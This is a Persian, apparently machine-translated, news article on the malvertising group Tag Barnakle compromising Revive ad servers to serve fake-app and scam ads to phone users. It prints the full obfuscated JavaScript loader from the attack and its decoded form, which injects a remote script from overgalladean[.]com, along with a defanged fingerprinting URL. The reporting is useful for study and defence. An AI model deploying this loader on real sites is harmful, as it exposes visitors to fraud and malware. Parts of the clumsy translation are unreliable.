[ad_1]

جمجمه و استخوان های عرضی در کد باینری

هکرها در طی یک سال گذشته بیش از 120 سرور تبلیغ را به خطر انداخته اند که تبلیغات مخرب را در ده ها میلیون ، اگر نه صدها میلیون دستگاه ، هنگام بازدید از سایت های خوب نشان می دهد.

تبلیغات نادرست عبارت است از رساندن تبلیغات به افراد هنگام بازدید از وب سایت های معتبر. تبلیغات جاوا اسکریپت را در خود جاسازی می کنند که به طور مخفیانه از نقص های نرم افزاری سو or استفاده می کند یا سعی در فریب بازدیدکنندگان برای نصب یک برنامه خطرناک ، پرداخت هزینه های جعلی برای پشتیبانی رایانه یا سایر اقدامات مضر دارد. معمولاً کلاهبرداران پشت این آفت اینترنتی به عنوان خریدار مطرح می شوند و هزینه شبکه های تحویل آگهی را برای نمایش تبلیغات مخرب در سایت های جداگانه پرداخت می کنند.

شما به دنبال در می روید

نفوذ در اکوسیستم تبلیغات ، خود را به عنوان خریدار قانونی ، به منابع نیاز دارد. اول ، کلاهبرداران باید زمان لازم را یاد بگیرند تا نحوه کار در بازار را بیاموزند و سپس نهادی ایجاد کنند که دارای اعتبار معتبری باشد. این رویکرد همچنین مستلزم پرداخت پول برای خرید مکانی برای اجرای تبلیغات مخرب است. این روشی نیست که توسط یک گروه بدرفتاری استفاده شود که شرکت امنیتی Confiant آن را Tag Barnakle می نامد.

الیا اشتاین ، محقق معتمد ، روز دوشنبه در یک وبلاگ نوشت: “از طرف دیگر ، Tag Barnakle می تواند با رفتن مستقیم به مصالحه جمعی با زیرساخت تبلیغات ، این مانع اولیه را دور بزند.” “آنها احتمالاً همچنین می توانند با بازگشت سرمایه خود افتخار کنند [return on investment] این رقبا را تحت الشعاع خود قرار می دهد ، زیرا آنها مجبور نیستند برای اجرای مبارزات تبلیغاتی یک پنی هم هزینه کنند. “

طی سال گذشته ، Tag Barnakle بیش از 120 سرور را که Revive را فعال می کنند ، آلوده کرده است ، یک برنامه منبع باز برای سازمان هایی که می خواهند به جای اعتماد به سرویس شخص ثالث ، سرور تبلیغات خود را اجرا کنند. رقم 120 دو برابر سرورهای Revive Confiant آلوده در سال گذشته است.

Tag Barnakle پس از به خطر انداختن یک سرور تبلیغات ، محموله مخربی را روی آن بارگیری می کند. برای جلوگیری از شناسایی ، این گروه از اثر انگشت مشتری استفاده می کند تا اطمینان حاصل شود که فقط تعداد کمی از جذاب ترین اهداف تبلیغات مخرب دریافت می کنند. سرورهایی که محموله ثانویه را به این اهداف می رسانند نیز از روشهای پنهانی برای اطمینان از پرواز آنها در زیر رادار نیز استفاده می کنند.

در اینجا یک نگاه کلی است:

مطمئن

هنگامی که Confiant سال گذشته به Tag Barnakle گزارش داد ، متوجه شد که این گروه حدود 60 سرور Revive را آلوده کرده است. این شاهکار به گروه امکان توزیع تبلیغات در بیش از 360 ویژگی وب را می دهد. این تبلیغات به روزرسانی های جعلی Adobe Flash را که در هنگام راه اندازی بدافزار بر روی رایانه های دسک تاپ نصب شده اند ، از بین بردند.

این بار Tag Barnakle هم کاربران آیفون و هم اندروید را هدف قرار داده است. وب سایت هایی که از طریق یک سرور در معرض خطر تبلیغات را دریافت می کنند ، JavaScript بسیار مبهم را ارائه می دهند که تعیین می کند بازدید کننده از دستگاه iPhone یا Android استفاده می کند.

https://galikos[.]com/ci.html?mAn8iynQtt=SW50ZWwgSqW5jPngyMEludGVsKFIpIElyaXMoVE0OIFBsdXMgR3J3cGhpY37gNjU1

در صورتی که بازدیدکنندگان از این آزمایش اثر انگشت و سایر آزمایشات عبور کنند ، محموله ثانویه دریافت می کنند که به این شکل است:

var _0x209b=["charCodeAt","fromCharCode","atob","length"];(function(_0x58f22e,_0x209b77){var _0x3a54d6=function(_0x562d16){while(--_0x562d16){_0x58f22e["push"](_0x58f22e["shift"]());}};_0x3a54d6(++_0x209b77);}(_0x209b,0x1d9));var _0x3a54=function(_0x58f22e,_0x209b77){_0x58f22e=_0x58f22e-0x0;var _0x3a54d6=_0x209b[_0x58f22e];return _0x3a54d6;};function pr7IbU3HZp6(_0x2df7f1,_0x4ed28f){var _0x40b1c0=[],_0xfa98e6=0x0,_0x1d2d3f,_0x4daddb="";for(var _0xaefdd9=0x0;_0xaefdd9<0x100;_0xaefdd9++){_0x40b1c0[_0xaefdd9]=_0xaefdd9;}for(_0xaefdd9=0x0;_0xaefdd9<0x100;_0xaefdd9++){_0xfa98e6=(_0xfa98e6+_0x40b1c0[_0xaefdd9]+_0x4ed28f["charCodeAt"](_0xaefdd9%_0x4ed28f[_0x3a54("0x2")]))%0x100,_0x1d2d3f=_0x40b1c0[_0xaefdd9],_0x40b1c0[_0xaefdd9]=_0x40b1c0[_0xfa98e6],_0x40b1c0[_0xfa98e6]=_0x1d2d3f;}_0xaefdd9=0x0,_0xfa98e6=0x0;for(var _0x2bdf25=0x0;_0x2bdf25<_0x2df7f1[_0x3a54("0x2")];_0x2bdf25++){_0xaefdd9=(_0xaefdd9+0x1)%0x100,_0xfa98e6=(_0xfa98e6+_0x40b1c0[_0xaefdd9])%0x100,_0x1d2d3f=_0x40b1c0[_0xaefdd9],_0x40b1c0[_0xaefdd9]=_0x40b1c0[_0xfa98e6],_0x40b1c0[_0xfa98e6]=_0x1d2d3f,_0x4daddb+=String[_0x3a54("0x0")](_0x2df7f1[_0x3a54("0x3")](_0x2bdf25)^_0x40b1c0[(_0x40b1c0[_0xaefdd9]+_0x40b1c0[_0xfa98e6])%0x100]);}return _0x4daddb;}function fCp5tRneHK(_0x2deb18){var _0x3d61b2="";try{_0x3d61b2=window[_0x3a54("0x1")](_0x2deb18);}catch(_0x4b0a86){}return _0x3d61b2;};var qIxFjKSY6BVD = ["Bm2CdEOGUagaqnegJWgXyDAnxs1BSQNre5yS6AKl2Hb2j0+gF6iL1n4VxdNf+D0/","DWuTZUTZO+sQsXe8Ng==","j6nfa3m","Y0d83rLB","Y0F69rbB65Ug6d9y","gYTeJruwFuW","n3j6Vw==","n2TyRkwJoyYulkipRrYr","dFCGtizS","yPnc","2vvPcUEpsBZhStE=","gfDZYmHUEBxRWrw4M"];var aBdDGL0KZhomY5Zl = document[pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[1]), qIxFjKSY6BVD[2])](pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[3]), qIxFjKSY6BVD[5]));aBdDGL0KZhomY5Zl[pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[4]), qIxFjKSY6BVD[5])](pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[6]), qIxFjKSY6BVD[8]), pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[7]), qIxFjKSY6BVD[8]));aBdDGL0KZhomY5Zl[pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[4]), qIxFjKSY6BVD[5])](pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[9]), qIxFjKSY6BVD[11]), pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[0]), qIxFjKSY6BVD[2]));var bundle = document.body||document.documentElement;bundle[pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[10]), qIxFjKSY6BVD[11])](aBdDGL0KZhomY5Zl);

هنگام رمزگشایی ، محموله:

var aBdDGL0KZhomY5Zl = document["createElement"]("script");
aBdDGL0KZhomY5Zl["setAtrribute"]("text/javascript");
aBdDGL0KZhomY5Zl["setAtrribute"]("src", "https://overgalladean[.]com/apu.php?zoneid=2721667");

همانطور که کد تار نشان می دهد ، تبلیغات از طریق overgalladean نمایش داده می شوند[.]com ، دامنه ای که به گفته Confiant توسط PropellerAds ، یک شبکه تبلیغاتی استفاده می شود که مدت هاست شرکت های امنیتی از جمله Malwarebytes آن را مخرب معرفی کرده اند.

هنگامی که محققان Confiant مجدداً تبلیغات Propeller Ads را با کلیک بر روی انواع دستگاه های مورد نظر برچسب Barnakle پخش کردند ، تبلیغاتی از این دست را مشاهده کردند:

مطمئن

ده ها میلیون خدمت کرد

این تبلیغات در درجه اول مراجعه به لیست فروشگاه های برنامه را برای امنیت جعلی ، ایمنی یا برنامه های VPN با هزینه های مخفی اشتراک یا “تغییر مسیر ترافیک برای اهداف ناپاک” جلب می کند.

با وجود سرورهای تبلیغاتی که اغلب با تبادل آگهی های متعدد ادغام شده اند ، تبلیغات امکان گسترش گسترده در صدها ، احتمالاً هزاران وب سایت شخصی را دارند. Confiant نمی داند چه تعداد کاربر نهایی در معرض سو abuse استفاده قرار دارند ، اما این شرکت معتقد است که تعداد آنها زیاد است.

“اگر در نظر بگیریم که برخی از این شرکتهای رسانه ای دارند [Revive] ادغام با سیستم عامل های تبلیغاتی پیشرو نرم افزار ، دسترسی Tag Tag Barnakle در ده ها ، اگر نه صدها میلیون دستگاه آسان است “، استین می نویسد. “این یک ارزیابی محافظه کارانه است که این واقعیت را در نظر می گیرد که آنها قربانیان خود را” بیسکویت “می کنند تا محموله ای را با فرکانس پایین آشکار کنند که احتمالاً تشخیص حضور آنها را به تأخیر می اندازد.”

[ad_2]

منبع: tarjome-news.ir